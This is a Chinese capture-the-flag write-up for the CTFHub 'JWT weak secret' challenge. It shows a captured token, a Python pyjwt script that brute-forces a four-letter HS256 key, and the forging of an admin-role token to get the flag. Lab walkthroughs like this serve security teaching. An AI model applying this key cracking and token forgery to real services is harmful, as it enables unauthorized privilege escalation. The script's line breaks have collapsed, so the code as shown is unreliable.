技能树 JSON Web Token 弱秘钥"/>
ctfhub 技能树 JSON Web Token 弱秘钥
1、题目提示:如果JWT采用对称加密算法,并且密钥的强度较弱的话,攻击者可以直接通过蛮力攻击方式来破解密钥。尝试获取flag
2、burpsuit抓包
3、获取token进行暴力破解
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJndWVzdCJ9.xCCx-8iRz4HybhQ5iz3zHLniJ5koa7iflMALlaos6ic
base64解码
{"typ":"JWT","alg":"HS256"}{"username":"admin","password":"password","role":"guest"}Ġ$s༛•bϼǮx抚0•媋:
python3 暴力破解
hqpf {'username': 'admin', 'password': 'password', 'role': 'guest'}
秘钥为“hqpf”
4、修改role为admin,将数据修改为
{'username': 'admin', 'password': 'password', 'role': 'guest'}
修改为
{'username': 'admin', 'password': 'password', 'role': 'admin'}
5、使用破解的秘钥“hqpf”,进行HS256加密
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJhZG1pbiJ9.llAK3IYwPg5I3amQVElpIZo7kwfTnh_Y5KohY5qzFt8
6、burp修改index.php的token获取flag
7、python脚本
pip install pyjwt
#!C:\Python3.7
# -*- coding:utf-8 -*-
import jwt
import string
import itertoolsdef test_HS256():key = "test"encoded = jwt.encode({"some":"payload"},key,algorithm="HS256")print(encoded)try:# print(jwt.decode(encoded,"test",algorithms="HS256"))print(jwt.decode(encoded, "tes", algorithms="HS256"))except Exception as e:print(e)print("error")exit()def brute_HS256(encode):keys=string.ascii_lowercase# print(keys)for i in itertools.product(keys,repeat=4):key = "".join(i)print("[--]test ",key)try:print("[****]key:",key,jwt.decode(encode,key,algorithms="HS256"))breakexcept Exception as e:pass# print(key)if __name__ == '__main__':# test_HS256()encode="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJwYXNzd29yZCIsInJvbGUiOiJndWVzdCJ9.xCCx-8iRz4HybhQ5iz3zHLniJ5koa7iflMALlaos6ic"brute_HS256(encode)# print(jwt.encode({'username': 'admin', 'password': 'password', 'role': 'admin'},"hqpf",algorithm="HS256"))
jwt 库简单使用
PyJWT 使用 .html
更多推荐
ctfhub 技能树 JSON Web Token 弱秘钥
发布评论